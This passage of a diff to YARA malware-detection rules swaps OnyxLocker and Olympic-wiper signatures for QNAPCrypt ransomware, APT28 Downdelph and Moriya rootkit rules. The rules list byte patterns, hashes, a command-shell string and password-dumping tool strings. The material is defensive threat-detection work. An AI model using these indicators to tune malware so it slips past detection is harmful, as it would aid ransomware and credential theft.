20 4e 57 47 49 4e 41 2e 44 4c 4c 2e 0a } + $dbg2 = { 54 68 65 20 65 6e 63 6f 64 65 64 20 70 61 73 73 77 6f 72 64 20 69 73 20 66 6f 75 6e 64 20 61 74 20 30 78 25 38 2e 38 6c 78 20 61 6e 64 20 68 61 73 20 61 20 6c 65 6e 67 74 68 20 6f 66 20 25 64 2e 0a } + $dbg3 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 74 68 65 20 70 61 73 73 77 6f 72 64 20 69 6e 20 6d 65 6d 6f 72 79 2e 0a } + $dbg4 = { 20 55 73 61 67 65 3a 20 25 73 20 44 6f 6d 61 69 6e 4e 61 6d 65 20 55 73 65 72 4e 61 6d 65 20 50 49 44 2d 6f 66 2d 57 69 6e 4c 6f 67 6f 6e 0a 0a } + $dbg5 = { 54 68 65 20 6c 6f 67 6f 6e 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 69 73 3a 20 25 53 2f 25 53 2f 25 53 2e 0a } + $dbg6 = { 54 68 65 20 57 69 6e 4c 6f 67 6f 6e 20 70 72 6f 63 65 73 73 20 69 64 20 69 73 20 25 64 20 28 30 78 25 38 2e 38 6c 78 29 2e 0a } + $dbg7 = { 59 6f 75 20 6c 6f 67 67 65 64 20 6f 6e 20 61 74 20 25 64 2f 25 64 2f 25 64 20 25 64 3a 25 64 3a 25 64 0a } + $dbg8 = { 54 68 65 20 68 61 73 68 20 62 79 74 65 20 69 73 3a 20 30 78 25 32 2e 32 78 2e 0a } + $dbg9 = { 53 55 56 57 68 14 ?? 40 00 e8 17 0c 00 00 8b 6c 24 1c [1-4] 45 00 50 68 e0 ?? 40 00 e8 ?? ?? 00 00 83 c4 ?? e8 ?? 02 00 00 85 c0 75 1d e8 ?? 02 00 00 85 c0 75 14 68 b4 ?? 40 00 e8 ?? 0b 00 00 83 c4 04 33 c0 5f 5e 5d 5b } condition: - uint16(0)==0x4a5d and filesize >30KB and $header and 1 of ($s*) and 2 of ($core*) and 2 of ($lib*) and $export + uint16(0)==0x4d5a and filesize >50KB and 6 of them } -rule ARKBIRD_SOLG_Ran_Onyxlocker_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_1 : FILE { meta: - description = "Detect OnyxLocker ransomware" + description = "Detect QNAPCrypt ransomware (x86 version)" author = "Arkbird_SOLG" - id = "bb7d914c-a074-5d79-a5d2-43c5a0adf49e" - date = "2020-11-18" - modified = "2020-11-18" - reference = "https://twitter.com/Kangxiaopao/status/1328614320016560128" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-18/OnyxLocker/Ran_OnyxLocker_Nov_2020_1.yar#L1-L27" + id = "fcdec43a-de70-57a2-9527-263685acc820" + date = "2021-08-11" + modified = "2021-08-12" + reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_1.yara#L1-L29" license_url = "N/A" - logic_hash = "1ccca1040acee5bb937fd5ebb3536f8c644d3586229d01457d780bef5fcb57a1" + logic_hash = "4dbe5241b9f1b68a15193f3d5c7b0b5fac80208c16917b6e543ce407301f1dcf" score = 75 quality = 71 tags = "FILE" - hash1 = "7e3c97d3d274b5f7fedad6e392e6576ac3e5724ddd7e48c58a654b6b95eb40d7" + hash1 = "551e03e17d1df9bd5b712bec7763578c01e7bffe9b93db246e36ec0a174f7467" + hash2 = "670250a169ba548c07a5066a70087e83bbc7fd468ef46199d76f97f9e7f72f36" + hash3 = "6df0897d4eb0826c47850968708143ecb9b58a0f3453caa615c0f62396ef816b" + hash4 = "fedcce505a5e307c1d116d52b3122f6484b3d25fb3c4d666fe7af087cfe85349" + tlp = "white" + adversary = "-" strings: - $s1 = "IEncryptionProvider" fullword ascii - $s2 = "OnyxLocker.exe" fullword wide - $s3 = "GetEncryptionThreads" fullword ascii - $s4 = "CreateEncryptionKey" fullword ascii - $s5 = ".NETFramework,Version=v4.5.2" fullword ascii - $s6 = "get_TargetFiles" fullword ascii - $s7 = "IsTargetFile" fullword ascii - $s8 = "<TargetFiles>k__BackingField" fullword ascii - $s9 = "XxteaEncryptionProvider" fullword ascii - $s10 = "GetStartingFolders" fullword ascii - $s11 = "<EncryptionKey>k__BackingField" fullword ascii - $s12 = "RECOVERY INSTRUCTIONS" fullword wide - $s13 = "$182eaa96-fcb2-458b-85cb-a9b8da57ae71" fullword ascii - $s14 = ".NET Framework 4.5.2" fullword ascii - $s15 = "TraverseDirectories" fullword ascii - $s16 = "{0} {1}" fullword wide + $s1 = { 2d 00 20 00 20 00 00 00 80 00 80 08 00 00 00 00 00 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 25 00 05 } + $s2 = { 2d 2d 2d 2d 2d 45 4e 44 20 00 00 00 00 00 00 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 } + $s3 = { 52 65 71 75 69 72 65 64 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73 0d 0a 57 77 77 2d 41 75 74 68 65 6e 74 69 63 61 74 65 5a 61 6e 61 62 61 7a 61 72 5f 53 71 75 61 72 65 0a 72 75 6e 74 69 6d 65 20 73 74 61 63 6b 3a } + $s4 = { 34 10 90 e5 80 20 9f e5 04 20 8d e5 08 10 8d e5 c8 10 9f e5 0c 10 8d e5 0a 30 a0 e3 10 30 8d e5 53 4e f8 eb 14 00 9d e5 00 10 90 e5 04 00 90 e5 00 00 50 e3 0c 00 00 da 04 00 91 e5 00 10 91 e5 04 10 8d e5 08 00 8d e5 94 00 9f e5 0c 00 8d e5 05 00 a0 e3 10 00 8d e5 15 e2 ff eb 14 00 dd e5 01 10 20 e2 84 00 9d e5 09 fe ff ea 00 00 a0 e3 00 10 a0 e3 f1 ff ff ea 0e 30 a0 e1 56 76 f9 eb fa } + $s5 = { 89 7c 24 2c 83 fe 20 19 db 89 f1 bf 01 00 00 00 d3 e7 21 df 89 fb 83 c7 ff 89 7c 24 24 83 c1 e0 89 4c 24 3c 83 f9 20 19 f6 f7 d9 89 4c 24 38 83 f9 20 19 ff 8b 4c 24 3c ba 01 00 00 00 d3 e2 21 f2 8b 4c 24 38 be 01 00 00 00 d3 ee 21 fe 09 d6 83 c3 ff 83 d6 ff 89 74 24 34 8b 54 24 44 8b 5c 24 2c 8b 7c 24 40 8b 4c 24 28 89 44 24 48 31 c0 89 44 24 30 31 c0 89 44 24 20 31 c0 89 44 24 1c } + $s6 = { 65 8b 0d 00 00 00 00 8b 89 fc ff ff ff 3b 61 08 0f 86 44 03 00 00 83 ec 58 c7 44 24 20 00 00 00 00 c7 44 24 24 00 00 00 00 8d 05 60 c3 27 08 89 44 24 20 8d 0d 28 af 31 08 89 4c 24 24 8b 0d 4c 35 4c 08 8d 15 50 e8 31 08 89 14 24 89 4c 24 04 8d 4c 24 20 89 4c 24 08 c7 44 24 0c 01 00 00 00 c7 44 24 10 01 00 00 00 e8 63 b9 ea ff 90 c7 05 94 38 4c 08 06 00 00 00 8b 05 d0 50 4d 08 85 c0 0f 85 b3 02 00 00 8d 05 1a d3 2b 08 89 05 90 38 4c 08 8b 05 a4 34 4c 08 89 04 24 8d 05 10 02 32 08 89 44 24 04 8d 05 90 38 4c 08 89 44 24 08 } + $x1 = { e8 [2] e4 ff 8b 44 24 08 89 44 24 28 8b 4c 24 0c 89 4c 24 2c 31 d2 31 db eb 18 8b 6c 24 40 83 c5 01 8b 54 24 44 83 d2 00 8b 44 24 28 8b 4c 24 2c 89 eb 39 ca 87 dd 0f ?? c3 87 dd } + $x2 = { 8b ?? 20 89 ?? 24 ff d0 8b 44 24 ?? 89 44 24 ?? 8b 4c 24 ?? 89 4c 24 ?? c7 44 24 68 65 43 68 30 c7 44 24 6c 72 61 69 78 89 ?? 24 89 ?? 24 04 e8 [2] e4 ff } + $x3 = { 74 11 90 e5 70 21 90 e5 68 31 90 e5 6c 41 90 e5 04 30 8d e5 08 40 8d e5 0c 20 8d e5 10 10 8d e5 91 5c fe eb 1c 00 9d e5 18 10 9d e5 14 30 9d e5 78 20 9d e5 40 10 82 e5 44 00 82 e5 ac b6 9f e5 00 00 9b e5 00 00 50 e3 27 06 00 1a 3c 30 82 e5 7c 02 9d e5 20 10 80 e2 1b 2e 8d e2 f9 0d fc eb 04 20 8d e2 1b 1e 8d e2 f6 0d fc eb 9e f4 ff eb 34 00 9d e5 78 30 9d e5 48 00 83 e5 7c 02 9d e5 d4 40 90 e5 d0 50 90 e5 cc 60 90 e5 04 60 8d e5 08 50 8d e5 0c 40 8d e5 fe f5 ff eb 10 00 9d e5 78 30 9d e5 4c 00 83 e5 04 00 8d e5 7c 02 9d e5 c0 40 80 e2 08 40 8d e5 8c fa ff eb 0c 00 9d e5 18 30 9d e5 10 40 9d e5 14 50 9d e5 78 60 9d e5 50 00 86 e5 14 b6 9f e5 00 00 9b e5 00 } + $x4 = { d0 00 8d e5 05 00 53 e3 a0 05 00 1a 00 30 d2 e5 68 00 53 e3 9a 05 00 1a 01 30 d2 e5 74 00 53 e3 94 05 00 1a 02 30 d2 e5 74 00 53 e3 8e 05 00 1a 03 30 d2 e5 70 00 53 e3 88 05 00 1a 04 20 d2 e5 73 00 52 e3 82 05 00 1a 9c 22 9d e5 54 30 92 e5 00 00 53 e3 72 04 00 0a 00 00 51 e3 6a 04 00 1a b4 12 9d e5 b8 32 9d e5 54 70 92 e5 58 07 9f e5 } + $x5 = { 55 6e 61 62 6c 65 20 74 6f 20 63 72 65 61 74 65 20 70 69 64 20 66 69 6c 65 20 3a 20 25 76 } + $x6 = { 53 61 76 65 20 63 75 72 72 20 50 49 44 20 25 64 } condition: - uint16(0)==0x5a4d and filesize >8KB and 8 of them + uint32(0)==0x464C457F and filesize >25KB and 3 of ($s*) and 2 of ($x*) } -rule ARKBIRD_SOLG_WIP_Unk_Wiper_July_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_2 : FILE { meta: - description = "Detect unknown wiper that focuses olympic games in Japan" + description = "Detect QNAPCrypt ransomware (x64 version)" author = "Arkbird_SOLG" - id = "a03d558e-399a-506e-8f37-d4907cc68d54" - date = "2021-07-22" - modified = "2021-07-22" - reference = "https://www.mbsd.jp/research/20210721/blog/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-22/WIP_Unk_Wiper_July_2021_1.yara#L1-L29" + id = "8cd54646-87da-5261-82f3-68ab96549379" + date = "2021-08-11" + modified = "2021-08-12" + reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_2.yara#L1-L22" license_url = "N/A" - logic_hash = "32f66fee2547ef33121620b822f86bfdf66ff337909a56aa4f0e8ef83b6d7730" + logic_hash = "9eb3a499afbaaf2addb8ee12cc2d479ebbacd4d19cc270e995f12e83546008b4" score = 75 - quality = 40 + quality = 73 tags = "FILE" - hash1 = "295d0aa4bf13befebafd7f5717e7e4b3b41a2de5ef5123ee699d38745f39ca4f" - hash2 = "511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390" - tlp = "green" - adversary = "Olympic Destroyer ?" + hash1 = "4829041c64971a0cb37d55e6ba83a57e01e76b26f3f744814b59bedbb3fefce8" + hash2 = "50470f94e7d65b50bf00d7416a9634d9e4141c5109a78f5769e4204906ab5f0b" + hash3 = "f9f5265f4c748ce0e2171915fb8edb6d967539ac46d624db8eb2586854dd0d9e" + tlp = "white" + adversary = "-" strings: - $s1 = "\\\\.\\Global\\ProcmonDebugLogger" fullword ascii - $s2 = { 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 00 00 00 00 4f 6c 6c 79 44 62 67 } - $s3 = { 8d 44 24 10 50 ff 15 08 30 40 00 50 ff 15 2c 30 40 00 83 7c 24 10 00 0f 85 76 02 00 00 33 c9 0f 1f } - $s4 = { 50 68 00 12 40 00 ff 15 60 30 40 00 85 c0 0f 85 ef 02 00 00 50 68 80 00 00 00 6a 03 50 6a 07 68 00 00 00 80 68 0c 32 40 00 ff 15 18 30 40 00 83 } - $s5 = { 8b 3d d0 30 40 00 88 84 0c e8 00 00 00 8d 84 24 e8 00 00 00 50 ff d7 83 c4 04 b0 9a 33 c9 0f 1f 00 f6 d0 88 84 0c b4 00 00 00 41 8a 81 30 32 40 } - $s6 = { 8b ec 83 ec 14 83 65 f4 00 8d 45 f4 83 65 f8 00 50 ff 15 34 30 40 00 8b 45 f8 33 45 f4 89 45 fc ff 15 38 30 40 00 31 45 fc ff 15 3c 30 40 00 31 45 fc 8d 45 ec 50 ff 15 40 30 40 00 8b 45 f0 8d 4d fc 33 45 ec 33 45 fc 33 } - $p1 = { 5c 2e 5c 47 6c 6f 62 61 6c 5c 35 84 44 65 62 75 67 4c 6f 67 67 3f } - $p2 = "UPX" fullword ascii - $p3 = { 45 6e 75 6d 57 69 6e 64 6f 77 73 } - $p4 = { 73 65 74 5f 6e 65 77 5f 6d 6f 64 65 00 00 00 5f 63 6f 6e 66 69 67 74 68 72 65 61 64 6c 6f 63 61 6c 65 } - $p5 = { 4e 75 74 6f 72 75 6e 2f 43 4e 65 74 } - $p6 = { 44 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 } - $p7 = { 53 6d 61 72 74 53 6e 69 66 66 67 } - $p8 = { 26 30 30 63 66 67 } - $p9 = { 72 6f 63 65 94 48 61 63 6b } + $s1 = { 52 45 41 44 4d 45 5f 46 4f 52 5f 44 45 43 52 59 50 54 } + $s2 = { 64 48 8b 0c 25 f8 ff ff ff 48 8d 44 24 ?? 48 3b 41 10 0f 86 [2] 00 00 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 48 8b 05 [3] 00 48 83 3d [3] 00 00 0f 86 [2] 00 00 48 8b 48 08 48 8b 00 48 89 04 24 48 89 4c 24 08 e8 [3] ff 48 c7 04 24 20 00 00 00 e8 [2] 00 00 48 c7 04 24 00 00 00 00 e8 [3] ff 48 8b 44 24 20 48 89 44 24 58 48 8b 4c 24 18 48 89 8c 24 88 00 00 00 48 8b 54 24 28 48 89 54 24 60 48 } + $s3 = { 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 } + $s4 = { 64 48 8b 0c 25 f8 ff ff ff 48 [0-5] 3b ?? 10 0f 86 [2] 00 00 48 ?? ec } + $s5 = { 48 83 ec 78 48 89 6c 24 70 48 8d 6c 24 70 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8b 15 [3] 00 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [3] ff 48 8b 44 24 18 48 85 c0 0f 84 10 01 00 00 48 8b 48 28 48 8b 50 20 48 8b 40 18 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 e8 [3] ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 8b 5c 24 30 48 85 d2 0f 85 a3 00 00 00 48 8d 15 [2] 03 00 48 39 d0 0f 85 13 01 00 00 48 8b 05 [3] 00 48 8b 15 [3] 00 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 48 8b 84 24 80 00 00 00 48 89 44 24 18 48 8b 84 24 88 00 00 00 48 89 44 24 20 48 8b 84 24 90 00 00 00 48 89 44 24 28 e8 [3] ff 48 8b 44 24 38 48 8b 4c 24 40 48 8b 54 24 48 48 8b 5c 24 50 48 8b 74 24 30 48 89 b4 24 98 00 00 00 48 89 84 24 a0 00 00 00 48 89 8c 24 a8 00 00 00 48 89 94 24 b0 00 00 00 48 89 9c 24 b8 00 00 00 48 8b 6c 24 } + $s6 = { 48 81 ec 48 01 00 00 48 89 ac 24 40 01 00 00 48 8d ac 24 40 01 00 00 48 8d 7c 24 38 48 8d 35 [2] 0f 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 [3] ff 48 8b 6d 00 48 8d 05 [2] 02 00 48 89 04 24 48 8b 84 24 50 01 00 00 48 89 44 24 08 48 89 44 24 10 e8 [3] ff 48 8b 44 24 18 48 89 84 24 38 01 00 00 31 c9 eb 18 8b 54 84 38 48 8b 5c 24 30 48 8b 84 24 38 01 00 00 89 14 98 48 8d 4b 01 48 8b 94 24 50 01 00 00 48 39 d1 7d 2c 48 89 4c 24 30 90 48 8b 05 [3] 00 48 89 04 24 48 c7 44 24 08 40 00 00 00 e8 [3] ff 48 8b 44 24 10 48 83 f8 40 72 b1 eb 46 48 c7 04 24 00 00 00 00 48 89 44 24 08 48 89 54 24 10 48 89 54 24 18 e8 [3] ff 48 8b 44 24 28 48 8b 4c 24 20 48 89 8c 24 58 01 00 00 48 89 84 24 60 01 00 00 48 8b ac 24 40 01 00 } condition: - uint16(0)==0x5a4d and filesize >200KB and (5 of ($s*) or 7 of ($p*)) + uint32(0)==0x464C457F and filesize >25KB and all of ($s*) +} +rule ARKBIRD_SOLG_APT_APT28_Downdelph_Feb_2021_1 : FILE +{ + meta: + description = "Detect Downdelph used by APT28 group" + author = "Arkbird_SOLG" + id = "0376c026-93eb-526a-8ab3-26bdd365e608" + date = "2021-02-18" + modified = "2021-02-19" + reference = "https://twitter.com/RedDrip7/status/1362343352759250946" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-18/APT28/APT_APT28_Downdelph_Feb_2021_1.yar#L1-L18" + license_url = "N/A" + logic_hash = "15e38ceeb0410645938ce2f90becf9a344711efd6e539f304de7b413f6f3b420" + score = 75 + quality = 75 + tags = "FILE" + hash1 = "ee7cfc55a49b2e9825a393a94b0baad18ef5bfced67531382e572ef8a9ecda4b" + + strings: + $s1 = { 53 [1-3] 81 c4 [2] ff ff 8b f2 8b ?? 54 8d 44 24 08 50 68 04 01 00 00 8b ?? e8 [12-22] 8d 54 24 04 8b c6 [73-133] 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 0c 89 01 89 51 04 8b 45 f0 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 10 89 01 89 51 04 8b c3 5b 8b e5 5d } + $s2 = "cmd.exe /c " fullword ascii + $s3 = "Failed to Save Stream %s is already associated with %s=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide + $s4 = { 53 00 79 00 73 00 74 00 65 00 6d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4b 00 65 00 79 00 62 00 6f 00 61 00 72 00 64 00 20 00 4c 00 61 00 79 00 6f 00 75 00 74 00 73 00 5c 00 25 00 2e 00 38 00 78 } + $s5 = { 4a 00 50 00 45 00 47 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 23 00 25 00 64 } + $s6 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 } + + condition: + uint16(0)==0x5a4d and filesize >100KB and 5 of them +} +rule ARKBIRD_SOLG_MAL_Moriya_May_2021_1 : FILE +{ + meta: + description = "Detect Moriya rootkit used in the TunnelSnake operation" + author = "Arkbird_SOLG" + id = "6a78ddc0-b39f-5aec-9c54-980854173abf" + date = "2020-05-07" + modified = "2021-05-26" + reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_1.yara#L1-L27" + license_url = "N/A" + logic_hash = "f73049f261428c8921a2c8a86fb5d242719e5dc9f30a5c58e86be1a79d84a42d" + score = 75 + quality = 75 + tags = "FILE" + hash1 = "3eda93de4a1e7a35c040fad914a4885d079ffc3c1362153b74e10ff9121de22b" + hash2 = "d620f9c32adc39b0632f22ec6a0503bf906fd1357f4435463fbb4b422634a536" + tlp = "White" + adversary = "Chinese APT Group" + + strings: + $seq1 = { 4c 8d 05 13 10 00 00 ff 15 95 12 00 00 48 8d 15 36 10 00 00 48 8d 4d c0 ff 15 fc 12 00 00 48 8d 15 65 10 00 00 48 8d 4d d0 ff 15 eb 12 00 00 48 8d 05 cc 23 00 00 41 b9 22 00 00 00 48 89 44 24 30 4c 8d 45 c0 c6 44 24 28 00 33 d2 83 64 24 20 00 48 8b cb ff 15 f0 11 00 00 33 d2 41 8b ce 8b f8 85 c0 79 09 4c 8d 05 6e } + $seq2 = { 4c 8d 05 85 10 00 00 ff 15 27 12 00 00 48 8b 05 80 23 00 00 48 8d 55 c0 48 8d 4d d0 83 48 30 04 ff 15 be 11 00 00 e8 c5 01 00 00 33 d2 41 8b ce 85 c0 79 0c } + $seq3 = { 33 db 48 8b 74 24 30 4c 8b 7c 24 38 48 8b 7c 24 40 4c 8b 64 24 48 4d 8b ec 48 8d 4c 24 58 ff 15 b7 1c 00 00 48 8b 46 10 49 89 44 24 f8 48 8b 46 08 49 89 45 f0 41 80 65 bb 0f 8a 46 18 24 0f 41 08 45 bb 4c 8b 4e 08 } + $seq4 = { 48 83 64 24 58 00 ba 44 5c 00 00 c7 44 24 50 79 00 00 00 41 b9 76 00 00 00 c7 44 24 48 78 6f 00 00 41 b8 69 72 00 00 c7 44 24 40 72 70 00 00 c7 44 24 38 69 00 00 00 c7 44 24 30 73 6e 00 00 c7 44 24 28 5c 00 00 00 c7 44 24 20 72 65 00 00 e8 03 f6 ff ff 48 8d 55 80 48 8d 4c 24 70 ff 15 74 17 00 00 48 8d 05 2d 28 00 00 45 33 c9 48 89 44 24 38 45 33 c0 48 8b 05 eb 16 00 00 48 83 64 24 30 00 c6 44 24 28 00 41 8d 51 40 48 8b 08 48 89 4c 24 20 48 8d 4c 24 70 ff 15 d9 16 00 00 85 c0 78 31 48 8b 0d ee 27 00 00 48 8b 81 e0 00 00 00 48 89 05 d8 27 00 00 48 8d 05 19 f7 ff ff 87 81 e0 00 00 00 48 8b 0d cc 27 00 00 ff 15 c6 16 00 00 33 c0 48 8b 4d 00 48 33 cc e8 58 0b 00 00 48 81 c4 10 01 00 } + $seq5 = { 40 55 53 56 57 41 56 48 8d ac 24 40 ff ff ff 48 81 ec c0 01 00 00 48 8b 05 47 1e 00 00 48 33 c4 48 89 85 b8 00 00 00 48 83 64 24 38 00 49 8b d8 48 83 64 24 50 00 48 8b fa 48 8b f1 33 d2 41 b8 c8 00 00 00 48 8d 4c 24 60 4d 8b f1 e8 0b 06 00 00 33 c0 48 8d 4d 30 0f 57 c0 48 89 85 b0 00 00 00 33 d2 0f 11 85 90 00 00 00 44 8d 40 58 0f 11 85 a0 00 00 00 e8 e2 05 00 00 0f 10 07 48 83 64 24 20 00 48 8d 05 72 f8 ff ff 48 89 44 24 40 48 8d 54 24 28 48 8d 05 81 fd ff ff 4d 8b c6 48 8b cb 48 89 44 24 48 f3 0f 7f 44 24 28 e8 13 05 00 00 8b d8 85 c0 0f 88 da 00 00 00 0f 10 07 48 8b 0d f7 1f 00 00 48 8d 05 30 0a 00 00 45 33 c9 48 89 45 40 f3 0f 7f 45 30 45 33 c0 48 8d 55 30 0f 10 06 48 89 45 48 f3 0f 7f 45 70 e8 22 05 00 00 8b d8 85 c0 0f 88 93 00 00 00 0f 10 06 83 65 c0 00 48 8d 05 14 0a 00 00 0f 10 0d 5d 0f 00 00 83 a5 a0 00 00 00 00 48 8d 54 24 60 48 8b 0d 9a 1f 00 00 45 33 c9 f3 0f 7f 45 a0 48 89 44 24 70 45 33 c0 0f 10 07 48 89 44 24 78 48 8d 85 90 00 00 00 48 89 45 d8 48 8d 44 24 20 f3 0f 7f 45 e4 c7 45 e0 03 50 00 00 0f 10 05 ff 0e 00 00 c7 45 d0 01 00 00 00 f3 0f 7f 8d 90 00 00 00 c7 85 a8 00 00 00 00 01 00 00 f3 0f 7f 45 b0 48 89 85 b0 00 00 00 e8 91 04 00 00 8b d8 85 c0 79 08 41 8b 0e e8 35 04 00 00 8b c3 48 8b 8d b8 00 00 00 48 33 cc e8 96 02 00 00 48 81 c4 c0 01 00 00 41 5e 5f 5e 5b } + $s1 = "Moriya : NotifyFunction\n" fullword ascii + $s2 = "Moriya Filter" fullword wide + $s3 = "Moriya : DeviceControlDispatch!\n" fullword ascii + $s4 = "Moriya : Waiting...\n" fullword ascii + $s5 = "Moriya : WriteDispatch!\n" fullword ascii + $s6 = { 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e } + $s7 = { 5c 00 44 00 6f 00 73 00 44 00 65 00 76 00 69 00 63 00 65 00 73 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e } + $s8 = "Moriya start\n" fullword ascii + + condition: + uint16(0)==0x5a4d and filesize >6KB and (3 of ($seq*) or 6 of ($s*)) +} +rule ARKBIRD_SOLG_MAL_Moriya_May_2021_2 : FILE +{ + meta: + description = "Detect Moriya rootkit used in the TunnelSnake operation" + author = "Arkbird_SOLG" + id = "25cecff1-94f9-5e8d-8758-9b891e9d7373" + date = "2020-05-26" + modified = "2021-05-27" + reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_2.yara#L1-L22" + license_url = "N/A" + logic_hash = "11ef00940604c3337b1c8c00903297343cfd4e8f3899b949d58e4203ab68d3fd" + score = 75 + quality = 75 + tags = "FILE" + hash1 = "ce21319bd21f76ab0f188a514e8ab1fe6f960c257475e45a23d11125d78df428" + tlp = "White" + adversary = "Chinese APT Group" + + strings: + $seq1 = { 8b 35 c4 30 40 00 8d 45 dc 68 92 24 40 00 50 ff d6 68 cc 24 40 00 8d 45 e4 50 ff d6 68 58 42 40 00 57 57 6a 22 8d 45 dc 50 57 53 ff 15 5c 30 40 00 8b f0 85 f6 0f 88 0a ff ff ff a1 58 42 40 00 83 48 1c 04 8d 45 dc 50 8d 45 e4 50 ff 15 60 30 40 00 e8 b2 00 00 00 } + $seq2 = { 68 3c 24 40 00 50 ff 15 c4 30 40 00 8d 85 d8 fe ff ff 50 ff 15 bc 30 40 00 85 c0 74 1b 8d 8d e0 fe ff ff 51 ff d0 8b 8d e4 fe ff ff 8b 85 e8 fe ff ff 0f b7 5d f4 eb 28 53 8d 85 cc fe ff ff 50 8d 85 d4 fe ff ff 50 8d 85 d0 fe ff ff 50 ff 15 ac 30 40 00 8b 8d d0 fe ff ff 8b 85 d4 fe ff ff c1 e1 08 0f b6 c0 0b c1 0f b6 cb } + $seq3 = { 8b 75 c0 8d 45 cc 50 ff 15 94 30 40 00 8b 5d c8 8b 43 0c 8b 55 bc 89 42 20 8b 43 08 89 42 1c 80 62 03 0f 8a 43 10 24 0f 08 42 03 8b 4b 08 85 c9 74 30 80 7e 24 00 74 06 f6 43 10 20 75 17 8b 46 18 85 c0 78 0a f6 43 10 40 75 0a 85 c0 79 20 f6 43 10 80 74 1a ff 73 0c 56 ff 75 b4 ff d1 8b f8 eb 0d 80 7e 21 00 74 07 8b 46 60 80 48 03 01 68 74 6e 68 00 53 ff 15 b4 30 40 00 } + $seq4 = { 6a 79 68 78 6f 00 00 68 72 70 00 00 6a 69 68 73 6e 00 00 6a 5c 68 72 65 00 00 6a 76 68 69 72 00 00 68 44 5c 00 00 50 e8 a2 f8 ff ff 83 c4 30 8d 85 7c ff ff ff 50 8d 85 6c ff ff ff 50 ff 15 c4 30 40 00 a1 88 30 40 00 68 34 42 40 00 56 56 ff 30 8d 85 6c ff ff ff 56 56 6a 40 50 ff 15 90 30 40 00 } + $seq5 = { 55 8b ec 81 ec 28 01 00 00 a1 04 40 40 00 33 c5 89 45 fc 8b 45 08 53 8b 5d 10 56 8b 75 0c 57 89 85 e8 fe ff ff 8d 7d 88 8b 45 14 6a 07 89 85 e4 fe ff ff 33 c0 59 f3 ab 33 ff 89 b5 d8 fe ff ff 68 94 00 00 00 8d 85 f0 fe ff ff 89 bd ec fe ff ff 57 50 e8 48 03 00 00 6a 06 89 7d e0 33 c0 59 8d 7d e4 f3 ab 33 ff 8d 45 a8 6a 38 57 50 89 7d a4 e8 2a 03 00 00 89 bd dc fe ff ff 8d 45 84 89 bd e0 fe ff ff 83 c4 18 89 bd dc fe ff ff 89 bd e0 fe ff ff 8d 7d 84 a5 ff b5 e4 fe ff ff 50 a5 53 a5 a5 c7 45 98 68 1b } + $s1 = "\\Device\\MoriyaStreamWatchmen" fullword wide + $s2 = "Moriya Filter" fullword wide + $s3 = "Moriya Callout" fullword wide + $s4 = "\\DosDevices\\MoriyaStreamWatchmen" fullword wide + + condition: + uint16(0)==0x5a4d and filesize >6KB and (3 of ($seq*) or 